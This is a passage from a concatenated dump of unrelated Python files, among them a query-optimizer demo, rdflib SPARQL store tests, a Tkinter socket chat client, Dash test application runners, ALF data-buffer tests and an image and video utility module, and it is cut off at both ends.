"t=van && s>60 && s<65", "c!=white && (t=sedan || t=truck)",
"i=pt335 && o!=pt211 && o!=pt208",
"t=van && i=pt335 && o=pt211",
"t!=sedan && c!=black && c!=silver && t!=truck",
"t=van && s>60 && s<65 && o=pt211",
"t!=suv && t!=van && c!=red && t!=white",
"(i=pt335 || i=pt342) && o!=pt211 && o!=pt208",
"i=pt335 && o=pt211 && t=van && c=red"]
# TODO: Support for parenthesis queries
query_list_mod = ["t=suv", "s>60",
"c=white", "c!=white", "o=pt211", "c=white && t=suv",
"s>60 && s<65", "t=sedan || t=truck",
"i=pt335 && o=pt211",
"t=suv && c!=white", "c=white && t!=suv && t!=van",
"t=van && s>60 && s<65",
"t=sedan || t=truck && c!=white",
"i=pt335 && o!=pt211 && o!=pt208",
"t=van && i=pt335 && o=pt211",
"t!=sedan && c!=black && c!=silver && t!=truck",
"t=van && s>60 && s<65 && o=pt211",
"t!=suv && t!=van && c!=red && t!=white",
"i=pt335 || i=pt342 && o!=pt211 && o!=pt208",
"i=pt335 && o=pt211 && t=van && c=red"]
query_list_test = ["c=white && t!=suv && t!=van"]
synthetic_pp_list = ["t=suv", "t=van", "t=sedan", "t=truck",
"c=red", "c=white", "c=black", "c=silver",
"s>40", "s>50", "s>60", "s<65", "s<70",
"i=pt335", "i=pt211", "i=pt342", "i=pt208",
"o=pt335", "o=pt211", "o=pt342", "o=pt208"]
query_list_short = ["t=van && s>60 && o=pt211"]
synthetic_pp_list_short = ["t=van", "s>60", "o=pt211"]
# TODO: Might need to change this to a R vs A curve instead of static
# numbers
# TODO: When selecting appropriate PPs, we only select based on reduction
# rate
synthetic_pp_stats_short = {
"t=van": {"none/dnn": {"R": 0.1, "C": 0.1, "A": 0.9},
"pca/dnn": {"R": 0.2, "C": 0.15, "A": 0.92},
"none/kde": {"R": 0.15, "C": 0.05, "A": 0.95}},
"s>60": {"none/dnn": {"R": 0.12, "C": 0.21, "A": 0.87},
"none/kde": {"R": 0.15, "C": 0.06, "A": 0.96}},
"o=pt211": {"none/dnn": {"R": 0.13, "C": 0.32, "A": 0.99},
"none/kde": {"R": 0.14, "C": 0.12, "A": 0.93}}}
synthetic_pp_stats = {"t=van": {"none/dnn": {"R": 0.1, "C": 0.1, "A": 0.9},
"pca/dnn": {"R": 0.2, "C": 0.15,
"A": 0.92},
"none/kde": {"R": 0.15, "C": 0.05,
"A": 0.95}},
"t=suv": {
"none/svm": {"R": 0.13, "C": 0.01, "A": 0.95}},
"t=sedan": {
"none/svm": {"R": 0.21, "C": 0.01, "A": 0.94}},
"t=truck": {
"none/svm": {"R": 0.05, "C": 0.01, "A": 0.99}},
"c=red": {
"none/svm": {"R": 0.131, "C": 0.011,
"A": 0.951}},
"c=white": {
"none/svm": {"R": 0.212, "C": 0.012,
"A": 0.942}},
"c=black": {
"none/svm": {"R": 0.133, "C": 0.013,
"A": 0.953}},
"c=silver": {
"none/svm": {"R": 0.214, "C": 0.014,
"A": 0.944}},
"s>40": {
"none/svm": {"R": 0.08, "C": 0.20, "A": 0.8}},
"s>50": {
"none/svm": {"R": 0.10, "C": 0.20, "A": 0.82}},
"s>60": {
"none/dnn": {"R": 0.12, "C": 0.21, "A": 0.87},
"none/kde": {"R": 0.15, "C": 0.06, "A": 0.96}},
"s<65": {
"none/svm": {"R": 0.05, "C": 0.20, "A": 0.8}},
"s<70": {
"none/svm": {"R": 0.02, "C": 0.20, "A": 0.9}},
"o=pt211": {
"none/dnn": {"R": 0.135, "C": 0.324, "A": 0.993},
"none/kde": {"R": 0.143, "C": 0.123,
"A": 0.932}},
"o=pt335": {
"none/dnn": {"R": 0.134, "C": 0.324, "A": 0.994},
"none/kde": {"R": 0.144, "C": 0.124,
"A": 0.934}},
"o=pt342": {
"none/dnn": {"R": 0.135, "C": 0.325, "A": 0.995},
"none/kde": {"R": 0.145, "C": 0.125,
"A": 0.935}},
"o=pt208": {
"none/dnn": {"R": 0.136, "C": 0.326, "A": 0.996},
"none/kde": {"R": 0.146, "C": 0.126,
"A": 0.936}},
"i=pt211": {
"none/dnn": {"R": 0.135, "C": 0.324, "A": 0.993},
"none/kde": {"R": 0.143, "C": 0.123,
"A": 0.932}},
"i=pt335": {
"none/dnn": {"R": 0.134, "C": 0.324, "A": 0.994},
"none/kde": {"R": 0.144, "C": 0.124,
"A": 0.934}},
"i=pt342": {
"none/dnn": {"R": 0.135, "C": 0.325, "A": 0.995},
"none/kde": {"R": 0.145, "C": 0.125,
"A": 0.935}},
"i=pt208": {
"none/dnn": {"R": 0.136, "C": 0.326, "A": 0.996},
"none/kde": {"R": 0.146, "C": 0.126,
"A": 0.936}}}
# TODO: We will need to convert the queries/labels into "car, bus, van,
# others". This is how the dataset defines things
label_desc = {"t": [constants.DISCRETE, ["sedan", "suv", "truck", "van"]],
"s": [constants.CONTINUOUS, [40, 50, 60, 65, 70]],
"c": [constants.DISCRETE,
["white", "red", "black", "silver"]],
"i": [constants.DISCRETE,
["pt335", "pt342", "pt211", "pt208"]],
"o": [constants.DISCRETE,
["pt335", "pt342", "pt211", "pt208"]]}
qo = QueryOptimizer()
print("Running Query Optimizer Demo...")
for query in query_list_mod:
# print(query, " -> ", (
# qo.run(query, synthetic_pp_list, synthetic_pp_stats, label_desc)))
print(qo.run(query, synthetic_pp_list_short,
synthetic_pp_stats_short, label_desc))
|
test_sparqlstore.py
|
from rdflib import Graph, URIRef, Literal
from urllib.request import urlopen
from urllib.error import HTTPError
import unittest
from nose import SkipTest
from http.server import BaseHTTPRequestHandler, HTTPServer
import socket
from threading import Thread
from . import helper
try:
assert len(urlopen("http://dbpedia.org/sparql").read()) > 0
except:
raise SkipTest("No HTTP connection.")
class SPARQLStoreDBPediaTestCase(unittest.TestCase):
store_name = "SPARQLStore"
path = "http://dbpedia.org/sparql"
storetest = True
create = False
def setUp(self):
self.graph = Graph(store="SPARQLStore")
self.graph.open(self.path, create=self.create)
ns = list(self.graph.namespaces())
assert len(ns) > 0, ns
def tearDown(self):
self.graph.close()
def test_Query(self):
query = "select distinct ?Concept where {[] a ?Concept} LIMIT 1"
res = helper.query_with_retry(self.graph, query, initNs={})
for i in res:
assert type(i[0]) == URIRef, i[0].n3()
def test_initNs(self):
query = """\
SELECT ?label WHERE
{ ?s a xyzzy:Concept ; xyzzy:prefLabel ?label . } LIMIT 10
"""
res = helper.query_with_retry(self.graph,
query, initNs={"xyzzy": "http://www.w3.org/2004/02/skos/core#"}
)
for i in res:
assert type(i[0]) == Literal, i[0].n3()
def test_noinitNs(self):
query = """\
SELECT ?label WHERE
{ ?s a xyzzy:Concept ; xyzzy:prefLabel ?label . } LIMIT 10
"""
self.assertRaises(ValueError, self.graph.query, query)
def test_query_with_added_prolog(self):
prologue = """\
PREFIX xyzzy: <http://www.w3.org/2004/02/skos/core#>
"""
query = """\
SELECT ?label WHERE
{ ?s a xyzzy:Concept ; xyzzy:prefLabel ?label . } LIMIT 10
"""
res = helper.query_with_retry(self.graph, prologue + query)
for i in res:
assert type(i[0]) == Literal, i[0].n3()
def test_counting_graph_and_store_queries(self):
query = """
SELECT ?s
WHERE {
?s ?p ?o .
}
LIMIT 5
"""
g = Graph("SPARQLStore")
g.open(self.path)
count = 0
result = helper.query_with_retry(g, query)
for _ in result:
count += 1
assert count == 5, "Graph(\"SPARQLStore\") didn't return 5 records"
from rdflib.plugins.stores.sparqlstore import SPARQLStore
st = SPARQLStore(query_endpoint=self.path)
count = 0
result = helper.query_with_retry(st, query)
for _ in result:
count += 1
assert count == 5, "SPARQLStore() didn't return 5 records"
class SPARQLStoreUpdateTestCase(unittest.TestCase):
def setUp(self):
port = self.setup_mocked_endpoint()
self.graph = Graph(store="SPARQLUpdateStore", identifier=URIRef("urn:ex"))
self.graph.open(
(
"http://localhost:{port}/query".format(port=port),
"http://localhost:{port}/update".format(port=port),
),
create=False,
)
ns = list(self.graph.namespaces())
assert len(ns) > 0, ns
def setup_mocked_endpoint(self):
# Configure mock server.
s = socket.socket(socket.AF_INET, type=socket.SOCK_STREAM)
s.bind(("localhost", 0))
address, port = s.getsockname()
s.close()
mock_server = HTTPServer(("localhost", port), SPARQL11ProtocolStoreMock)
# Start running mock server in a separate thread.
# Daemon threads automatically shut down when the main process exits.
mock_server_thread = Thread(target=mock_server.serve_forever)
mock_server_thread.setDaemon(True)
mock_server_thread.start()
print(
"Started mocked sparql endpoint on http://localhost:{port}/".format(
port=port
)
)
return port
def tearDown(self):
self.graph.close()
def test_Query(self):
query = "insert data {<urn:s> <urn:p> <urn:o>}"
res = self.graph.update(query)
print(res)
class SPARQL11ProtocolStoreMock(BaseHTTPRequestHandler):
def do_POST(self):
"""
If the body should be analysed as well, just use:
```
body = self.rfile.read(int(self.headers['Content-Length'])).decode()
print(body)
```
"""
contenttype = self.headers.get("Content-Type")
if self.path == "/query" or self.path == "/query?":
if self.headers.get("Content-Type") == "application/sparql-query":
pass
elif (
self.headers.get("Content-Type") == "application/x-www-form-urlencoded"
):
pass
else:
self.send_response(406, "Not Acceptable")
self.end_headers()
elif self.path == "/update" or self.path == "/update?":
if self.headers.get("Content-Type") == "application/sparql-update":
pass
elif (
self.headers.get("Content-Type") == "application/x-www-form-urlencoded"
):
pass
else:
self.send_response(406, "Not Acceptable")
self.end_headers()
else:
print("self.path")
print(self.path)
self.send_response(404, "Not Found")
self.end_headers()
self.send_response(200, "OK")
self.end_headers()
return
def do_GET(self):
# Process an HTTP GET request and return a response with an HTTP 200 status.
self.send_response(200, "OK")
self.end_headers()
return
if __name__ == "__main__":
unittest.main()
|
ThreadExample.py
|
# -*- coding: utf-8 -*-
#!/usr/bin/env python3
#
# Copyright (C) James Chapman 2019
#
import queue
import threading
import time
from pythonsnippets.Parallel.ThreadWorker import ThreadWorker
def main():
# Create Queues
waiting_q = queue.Queue()
waiting_lk = threading.Lock()
complete_q = queue.Queue()
complete_lk = threading.Lock()
for i in range(100):
waiting_q.put(i)
# Create and start threads using different methods
worker = ThreadWorker(waiting_q, waiting_lk, complete_q, complete_lk)
thread1 = threading.Thread(target=worker.doStuff, args=())
thread1.start()
# thread2 works because our ThreadWorker class inherits threading.Thread (see class definition)
thread2 = ThreadWorker(waiting_q, waiting_lk, complete_q, complete_lk)
thread2.start()
# Let the threads run for 10 seconds before setting stop event
time.sleep(10)
worker.stop()
thread2.stop()
# Wait for threads to exit.
while (thread1.is_alive() or thread2.is_alive()):
time.sleep(1)
print("Waiting Q size: {0}".format(waiting_q.qsize()))
print("Complete Q size: {0}".format(complete_q.qsize()))
if __name__ == '__main__':
main()
|
start.py
|
import sqlite3 as sqlite
import json
import threading
import uvicorn
import setupDB
from tnChecker import TNChecker
from ethChecker import ETHChecker
with open('config.json') as json_file:
config = json.load(json_file)
def main():
#check db
try:
dbCon = sqlite.connect('gateway.db')
result = dbCon.cursor().execute('SELECT chain, height FROM heights WHERE chain = "TN" or chain = "ETH"').fetchall()
#dbcon.close()
if len(result) == 0:
setupDB.initialisedb(config)
except:
setupDB.createdb()
setupDB.initialisedb(config)
setupDB.createVerify()
#load and start threads
tn = TNChecker(config)
eth = ETHChecker(config)
ethThread = threading.Thread(target=eth.run)
tnThread = threading.Thread(target=tn.run)
ethThread.start()
tnThread.start()
#start app
uvicorn.run("gateway:app", host="0.0.0.0", port=config["main"]["port"], log_level="info")
main()
|
client.py
|
'''
Client Side code
'''
from socket import AF_INET, socket, SOCK_STREAM
from threading import Thread
import Tkinter as tkinter
def receive():
"""Handles receiving of messages."""
while True:
try:
msg = client_socket.recv(BUFSIZ).decode("utf8")
msg_list.insert(tkinter.END, msg)
except OSError: # Possibly client has left the chat.
break
def send(event=None): # event is passed by binders.
"""Handles sending of messages."""
msg = my_msg.get()
my_msg.set("") # Clears input field.
client_socket.send(bytes(msg))
if msg == "{quit}":
client_socket.close()
top.quit()
def on_closing(event=None):
"""This function is to be called when the window is closed."""
my_msg.set("{quit}")
send()
top = tkinter.Tk()
top.title("Chatter")
messages_frame = tkinter.Frame(top)
my_msg = tkinter.StringVar() # For the messages to be sent.
my_msg.set("Type your messages here.")
scrollbar = tkinter.Scrollbar(messages_frame) # To navigate through past messages.
# Following will contain the messages.
msg_list = tkinter.Listbox(messages_frame, height=15, width=50, yscrollcommand=scrollbar.set)
scrollbar.pack(side=tkinter.RIGHT, fill=tkinter.Y)
msg_list.pack(side=tkinter.LEFT, fill=tkinter.BOTH)
msg_list.pack()
messages_frame.pack()
entry_field = tkinter.Entry(top, textvariable=my_msg)
entry_field.bind("<Return>", send)
entry_field.pack()
send_button = tkinter.Button(top, text="Send", command=send)
send_button.pack()
top.protocol("WM_DELETE_WINDOW", on_closing)
#----Now comes the sockets part----
HOST = input('Enter host: ')
PORT = input('Enter port: ')
if not PORT:
PORT = 33000
else:
PORT = int(PORT)
BUFSIZ = 1024
ADDR = (HOST, PORT)
client_socket = socket(AF_INET, SOCK_STREAM)
client_socket.connect(ADDR)
receive_thread = Thread(target=receive)
receive_thread.start()
tkinter.mainloop() # Starts GUI execution.
|
application_runners.py
|
from __future__ import print_function
import sys
import os
import uuid
import shlex
import threading
import subprocess
import logging
import runpy
import future.utils as utils
import flask
import requests
from dash.testing.errors import (
NoAppFoundError,
TestingTimeoutError,
ServerCloseError,
)
import dash.testing.wait as wait
logger = logging.getLogger(__name__)
def import_app(app_file, application_name="app"):
"""
Import a dash application from a module.
The import path is in dot notation to the module.
The variable named app will be returned.
:Example:
>>> app = import_app('my_app.app')
Will import the application in module `app` of the package `my_app`.
:param app_file: Path to the app (dot-separated).
:type app_file: str
:param application_name: The name of the dash application instance.
:raise: dash_tests.errors.NoAppFoundError
:return: App from module.
:rtype: dash.Dash
"""
try:
app_module = runpy.run_module(app_file)
app = app_module[application_name]
except KeyError:
logger.exception("the app name cannot be found")
raise NoAppFoundError(
"No dash `app` instance was found in {}".format(app_file)
)
return app
class BaseDashRunner(object):
"""Base context manager class for running applications."""
def __init__(self, keep_open, stop_timeout):
self.port = 8050
self.started = None
self.keep_open = keep_open
self.stop_timeout = stop_timeout
def start(self, *args, **kwargs):
raise NotImplementedError # pragma: no cover
def stop(self):
raise NotImplementedError # pragma: no cover
@staticmethod
def accessible(url):
try:
requests.get(url)
except requests.exceptions.RequestException:
return False
return True
def __call__(self, *args, **kwargs):
return self.start(*args, **kwargs)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, traceback):
if self.started and not self.keep_open:
try:
logger.info("killing the app runner")
self.stop()
except TestingTimeoutError:
raise ServerCloseError(
"Cannot stop server within {}s timeout".format(
self.stop_timeout
)
)
@property
def url(self):
"""the default server url"""
return "http://localhost:{}".format(self.port)
@property
def is_windows(self):
return sys.platform == "win32"
class ThreadedRunner(BaseDashRunner):
"""Runs a dash application in a thread
this is the default flavor to use in dash integration tests
"""
def __init__(self, keep_open=False, stop_timeout=3):
super(ThreadedRunner, self).__init__(
keep_open=keep_open, stop_timeout=stop_timeout
)
self.stop_route = "/_stop-{}".format(uuid.uuid4().hex)
self.thread = None
@staticmethod
def _stop_server():
# https://werkzeug.palletsprojects.com/en/0.15.x/serving/#shutting-down-the-server
stopper = flask.request.environ.get("werkzeug.server.shutdown")
if stopper is None:
raise RuntimeError("Not running with the Werkzeug Server")
stopper()
return "Flask server is shutting down"
# pylint: disable=arguments-differ,C0330
def start(self, app, **kwargs):
"""Start the app server in threading flavor"""
app.server.add_url_rule(
self.stop_route, self.stop_route, self._stop_server
)
def _handle_error():
self._stop_server()
app.server.errorhandler(500)(_handle_error)
def run():
app.scripts.config.serve_locally = True
app.css.config.serve_locally = True
if "port" not in kwargs:
kwargs["port"] = self.port
else:
self.port = kwargs["port"]
app.run_server(threaded=True, **kwargs)
self.thread = threading.Thread(target=run)
self.thread.daemon = True
try:
self.thread.start()
except RuntimeError: # multiple call on same thread
logger.exception("threaded server failed to start")
self.started = False
self.started = self.thread.is_alive()
# wait until server is able to answer http request
wait.until(lambda: self.accessible(self.url), timeout=1)
def stop(self):
requests.get("{}{}".format(self.url, self.stop_route))
wait.until_not(self.thread.is_alive, self.stop_timeout)
class ProcessRunner(BaseDashRunner):
"""Runs a dash application in a waitress-serve subprocess
this flavor is closer to production environment but slower
"""
def __init__(self, keep_open=False, stop_timeout=3):
super(ProcessRunner, self).__init__(
keep_open=keep_open, stop_timeout=stop_timeout
)
self.proc = None
# pylint: disable=arguments-differ
def start(self, app_module, application_name="app", port=8050):
"""Start the server with waitress-serve in process flavor """
entrypoint = "{}:{}.server".format(app_module, application_name)
self.port = port
args = shlex.split(
"waitress-serve --listen=0.0.0.0:{} {}".format(port, entrypoint),
posix=not self.is_windows,
)
logger.debug("start dash process with %s", args)
try:
self.proc = subprocess.Popen(
args, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
# wait until server is able to answer http request
wait.until(lambda: self.accessible(self.url), timeout=3)
except (OSError, ValueError):
logger.exception("process server has encountered an error")
self.started = False
return
self.started = True
def stop(self):
if self.proc:
try:
self.proc.terminate()
if utils.PY3:
# pylint:disable=no-member
_except = subprocess.TimeoutExpired
# pylint: disable=unexpected-keyword-arg
self.proc.communicate(timeout=self.stop_timeout)
else:
_except = OSError
self.proc.communicate()
except _except:
logger.exception(
"subprocess terminate not success, trying to kill "
"the subprocess in a safe manner"
)
self.proc.kill()
self.proc.communicate()
class RRunner(ProcessRunner):
def __init__(self, keep_open=False, stop_timeout=3):
super(RRunner, self).__init__(
keep_open=keep_open, stop_timeout=stop_timeout
)
self.proc = None
# pylint: disable=arguments-differ
def start(self, app):
"""Start the server with waitress-serve in process flavor """
# app is a R string chunk
if not (os.path.isfile(app) and os.path.exists(app)):
path = (
"/tmp/app_{}.R".format(uuid.uuid4().hex)
if not self.is_windows
else os.path.join(
(os.getenv("TEMP"), "app_{}.R".format(uuid.uuid4().hex))
)
)
logger.info("RRuner start => app is R code chunk")
logger.info("make a temporay R file for execution=> %s", path)
logger.debug("the content of dashR app")
logger.debug("%s", app)
with open(path, "w") as fp:
fp.write(app)
app = path
logger.info("Run dashR app with Rscript => %s", app)
args = shlex.split(
"Rscript {}".format(os.path.realpath(app)),
posix=not self.is_windows,
)
logger.debug("start dash process with %s", args)
try:
self.proc = subprocess.Popen(
args, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
# wait until server is able to answer http request
wait.until(lambda: self.accessible(self.url), timeout=2)
except (OSError, ValueError):
logger.exception("process server has encountered an error")
self.started = False
return
self.started = True
|
data_buffer_test.py
|
# Copyright (c) 2019 Horizon Robotics. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import multiprocessing as mp
from collections import namedtuple
import os
import tempfile
from time import sleep
import torch
from absl.testing import parameterized
import alf
from alf.tensor_specs import TensorSpec
from alf.utils.data_buffer import RingBuffer, DataBuffer
from alf.utils.checkpoint_utils import Checkpointer
DataItem = alf.data_structures.namedtuple(
"DataItem", [
"env_id", "x", "o", "reward", "step_type", "batch_info",
"replay_buffer", "rollout_info_field"
],
default_value=())
# Using cpu tensors are needed for running on cuda enabled devices,
# as we are not using the spawn method to start subprocesses.
def get_batch(env_ids, dim, t, x):
batch_size = len(env_ids)
x = torch.as_tensor(x, dtype=torch.float32, device="cpu")
t = torch.as_tensor(t, dtype=torch.int32, device="cpu")
ox = (x * torch.arange(
batch_size, dtype=torch.float32, requires_grad=True,
device="cpu").unsqueeze(1) * torch.arange(
dim, dtype=torch.float32, requires_grad=True,
device="cpu").unsqueeze(0))
a = x * torch.ones(batch_size, dtype=torch.float32, device="cpu")
g = torch.zeros(batch_size, dtype=torch.float32, device="cpu")
# reward function adapted from ReplayBuffer: default_reward_fn
r = torch.where(
torch.abs(a - g) < .05,
torch.zeros(batch_size, dtype=torch.float32, device="cpu"),
-torch.ones(batch_size, dtype=torch.float32, device="cpu"))
return DataItem(
env_id=torch.tensor(env_ids, dtype=torch.int64, device="cpu"),
x=ox,
step_type=t * torch.ones(batch_size, dtype=torch.int32, device="cpu"),
o=dict({
"a": a,
"g": g
}),
reward=r)
class RingBufferTest(parameterized.TestCase, alf.test.TestCase):
dim = 20
max_length = 4
num_envs = 8
def __init__(self, *args):
super().__init__(*args)
alf.set_default_device("cpu") # spawn forking is required to use cuda.
self.data_spec = DataItem(
env_id=alf.TensorSpec(shape=(), dtype=torch.int64),
x=alf.TensorSpec(shape=(self.dim, ), dtype=torch.float32),
step_type=alf.TensorSpec(shape=(), dtype=torch.int32),
o=dict({
"a": alf.TensorSpec(shape=(), dtype=torch.float32),
"g": alf.TensorSpec(shape=(), dtype=torch.float32)
}),
reward=alf.TensorSpec(shape=(), dtype=torch.float32))
@parameterized.named_parameters([
('test_sync', False),
('test_async', True),
])
def test_ring_buffer(self, allow_multiprocess):
ring_buffer = RingBuffer(
data_spec=self.data_spec,
num_environments=self.num_envs,
max_length=self.max_length,
allow_multiprocess=allow_multiprocess)
batch1 = get_batch([1, 2, 3, 5, 6], self.dim, t=1, x=0.4)
if not allow_multiprocess:
# enqueue: blocking mode only available under allow_multiprocess
self.assertRaises(
AssertionError,
ring_buffer.enqueue,
batch1,
env_ids=batch1.env_id,
blocking=True)
# Test dequeque()
for t in range(2, 10):
batch1 = get_batch([1, 2, 3, 5, 6], self.dim, t=t, x=0.4)
# test that the created batch has gradients
self.assertTrue(batch1.x.requires_grad)
ring_buffer.enqueue(batch1, batch1.env_id)
if not allow_multiprocess:
# dequeue: blocking mode only available under allow_multiprocess
self.assertRaises(
AssertionError,
ring_buffer.dequeue,
env_ids=batch1.env_id,
blocking=True)
# Exception because some environments do not have data
self.assertRaises(AssertionError, ring_buffer.dequeue)
batch = ring_buffer.dequeue(env_ids=batch1.env_id)
self.assertEqual(batch.step_type, torch.tensor([6] * 5))
# test that RingBuffer detaches gradients of inputs
self.assertFalse(batch.x.requires_grad)
batch = ring_buffer.dequeue(env_ids=batch1.env_id)
self.assertEqual(batch.step_type, torch.tensor([7] * 5))
batch = ring_buffer.dequeue(env_ids=torch.tensor([1, 2]))
self.assertEqual(batch.step_type, torch.tensor([8] * 2))
batch = ring_buffer.dequeue(env_ids=batch1.env_id)
self.assertEqual(batch.step_type,
torch.tensor([[9], [9], [8], [8], [8]]))
# Exception because some environments do not have data
self.assertRaises(
AssertionError, ring_buffer.dequeue, env_ids=batch1.env_id)
# Test dequeue multiple
ring_buffer.clear()
for t in range(5, 10):
batch1 = get_batch([1, 2, 3, 5, 6], self.dim, t=t, x=0.4)
# test that the created batch has gradients
ring_buffer.enqueue(batch1, batch1.env_id)
# Normal dequeue in the middle of the ring buffer
batch = ring_buffer.dequeue(env_ids=batch1.env_id, n=2)
self.assertEqual(batch.step_type, torch.tensor([[6, 7]] * 5))
# This dequeue crosses the end of the ring buffer
batch = ring_buffer.dequeue(env_ids=batch1.env_id, n=2)
self.assertEqual(batch.step_type, torch.tensor([[8, 9]] * 5))
# Test remove_up_to
ring_buffer.remove_up_to(4)
for t in range(6, 10):
batch2 = get_batch(range(0, 8), self.dim, t=t, x=0.4)
ring_buffer.enqueue(batch2)
prev_size = ring_buffer._current_size.clone()
prev_pos = ring_buffer._current_pos.clone()
ring_buffer.remove_up_to(2)
self.assertEqual(prev_size - 2, ring_buffer._current_size)
# shouldn't change last data pos
self.assertEqual(prev_pos, ring_buffer._current_pos)
# remove_up_to more than there are elements shouldn't raise error
ring_buffer.remove_up_to(3)
self.assertEqual(ring_buffer._current_size, torch.tensor([0] * 8))
if allow_multiprocess:
# Test block on dequeue without enough data
def delayed_enqueue(ring_buffer, batch):
alf.set_default_device("cpu")
sleep(0.04)
ring_buffer.enqueue(batch, batch.env_id)
p = mp.Process(
target=delayed_enqueue,
args=(ring_buffer,
alf.nest.map_structure(lambda x: x.cpu(), batch1)))
p.start()
batch = ring_buffer.dequeue(env_ids=batch1.env_id, blocking=True)
self.assertEqual(batch.step_type, torch.tensor([9] * 2))
# Test block on enqueue without free space
ring_buffer.clear()
for t in range(6, 10):
batch2 = get_batch(range(0, 8), self.dim, t=t, x=0.4)
ring_buffer.enqueue(batch2)
def delayed_dequeue():
# cpu tensor on subprocess. Otherwise, spawn method is needed.
alf.set_default_device("cpu")
sleep(0.04)
ring_buffer.dequeue() # 6(deleted), 7, 8, 9
sleep(0.04) # 10, 7, 8, 9
ring_buffer.dequeue() # 10, 7(deleted), 8, 9
p = mp.Process(target=delayed_dequeue)
p.start()
batch2 = get_batch(range(0, 8), self.dim, t=10, x=0.4)
ring_buffer.enqueue(batch2, blocking=True)
p.join()
self.assertEqual(ring_buffer._current_size[0], torch.tensor([3]))
# Test stop queue event
def blocking_dequeue(ring_buffer):
ring_buffer.dequeue(blocking=True)
p = mp.Process(target=blocking_dequeue, args=(ring_buffer, ))
ring_buffer.clear()
p.start()
sleep(0.02) # for subprocess to enter while loop
ring_buffer.stop()
p.join()
self.assertEqual(
ring_buffer.dequeue(env_ids=batch1.env_id, blocking=True),
None)
ring_buffer.revive()
for t in range(6, 10):
batch2 = get_batch(range(0, 8), self.dim, t=t, x=0.4)
self.assertEqual(
ring_buffer.enqueue(batch2, blocking=True), True)
ring_buffer.stop()
self.assertEqual(ring_buffer.enqueue(batch2, blocking=True), False)
class DataBufferTest(alf.test.TestCase):
def test_data_buffer(self):
dim = 20
capacity = 256
data_spec = (TensorSpec(shape=()), TensorSpec(shape=(dim // 3 - 1, )),
TensorSpec(shape=(dim - dim // 3, )))
data_buffer = DataBuffer(data_spec=data_spec, capacity=capacity)
def _get_batch(batch_size):
x = torch.randn(batch_size, dim, requires_grad=True)
x = (x[:, 0], x[:, 1:dim // 3], x[..., dim // 3:])
return x
data_buffer.add_batch(_get_batch(100))
self.assertEqual(int(data_buffer.current_size), 100)
batch = _get_batch(1000)
# test that the created batch has gradients
self.assertTrue(batch[0].requires_grad)
data_buffer.add_batch(batch)
ret = data_buffer.get_batch(2)
# test that DataBuffer detaches gradients of inputs
self.assertFalse(ret[0].requires_grad)
self.assertEqual(int(data_buffer.current_size), capacity)
ret = data_buffer.get_batch_by_indices(torch.arange(capacity))
self.assertEqual(ret[0], batch[0][-capacity:])
self.assertEqual(ret[1], batch[1][-capacity:])
self.assertEqual(ret[2], batch[2][-capacity:])
batch = _get_batch(100)
data_buffer.add_batch(batch)
ret = data_buffer.get_batch_by_indices(
torch.arange(data_buffer.current_size - 100,
data_buffer.current_size))
self.assertEqual(ret[0], batch[0])
self.assertEqual(ret[1], batch[1])
self.assertEqual(ret[2], batch[2][-capacity:])
# Test checkpoint working
with tempfile.TemporaryDirectory() as checkpoint_directory:
checkpoint = Checkpointer(
checkpoint_directory, data_buffer=data_buffer)
checkpoint.save(10)
data_buffer = DataBuffer(data_spec=data_spec, capacity=capacity)
checkpoint = Checkpointer(
checkpoint_directory, data_buffer=data_buffer)
global_step = checkpoint.load()
self.assertEqual(global_step, 10)
ret = data_buffer.get_batch_by_indices(
torch.arange(data_buffer.current_size - 100,
data_buffer.current_size))
self.assertEqual(ret[0], batch[0])
self.assertEqual(ret[1], batch[1])
self.assertEqual(ret[2], batch[2][-capacity:])
data_buffer.clear()
self.assertEqual(int(data_buffer.current_size), 0)
if __name__ == '__main__':
alf.test.main()
|
media.py
|
from PIL import Image
from typing import List
from machin.parallel import get_context
import os
import numpy as np
import moviepy.editor as mpy
import matplotlib.pyplot as plt
def show_image(
image: np.ndarray,
show_normalized: bool = True,
pause_time: float = 0.01,
title: str = "",
):
"""
Use matplotlib to show a single image. You may repeatedly call this method
with the same ``title`` argument to show a video or a dynamically changing
image.
Args:
image: A numpy array of shape (H, W, C) or (H, W), and with ``dtype``
= any float or any int.
When a frame is float type, its value range should be [0, 1].
When a frame is integer type, its value range should be [0, 255].
show_normalized: Show normalized image alongside the original one.
pause_time: Pause time between displaying current image and the next
one.
title: Title of the display window.
"""
if np.issubdtype(image.dtype, np.integer):
image = image.astype(np.floating) / 255
fig = plt.figure(title, clear=True)
fig.canvas.manager.set_window_title(title)
if show_normalized:
ax = fig.add_subplot(1, 2, 1)
ax.set_facecolor((0.0, 0.0, 0.0))
ax.imshow(image, vmin=np.min(image), vmax=np.max(image))
ax2 = fig.add_subplot(1, 2, 2)
ax2.set_facecolor((0.0, 0.0, 0.0))
pix_range = (np.max(image) - np.min(image)) + 1e-6
ax2.imshow((image - np.min(image)) / pix_range, vmin=0, vmax=1)
plt.pause(pause_time)
else:
ax = fig.add_subplot(1, 1, 1)
ax.set_facecolor((0.0, 0.0, 0.0))
ax.imshow(image, vmin=np.min(image), vmax=np.max(image))
plt.pause(pause_time)
def create_video(
frames: List[np.ndarray],
path: str,
filename: str,
extension: str = ".gif",
fps: int = 15,
):
"""
Args:
frames: A list of numpy arrays of shape (H, W, C) or (H, W), and with
``dtype`` = any float or any int.
When a frame is float type, its value range should be [0, 1].
When a frame is integer type, its value range should be [0, 255].
path: Directory to save the video.
filename: File name.
extension: File extension.
fps: frames per second.
"""
if frames:
for f in range(len(frames)):
if np.issubdtype(frames[f].dtype, np.integer):
frames[f] = frames[f].astype(np.uint8)
elif np.issubdtype(frames[f].dtype, np.floating):
frames[f] = (frames[f] * 255).astype(np.uint8)
if frames[f].ndim == 2:
# consider as a grey scale image
frames[f] = np.repeat(frames[f][:, :, np.newaxis], 3, axis=2)
clip = mpy.ImageSequenceClip(frames, fps=fps)
if extension.lower() == ".gif":
clip.write_gif(
os.path.join(path, filename + extension),
fps=fps,
verbose=False,
logger=None,
)
else:
clip.write_videofile(
os.path.join(path, filename + extension),
fps=fps,
verbose=False,
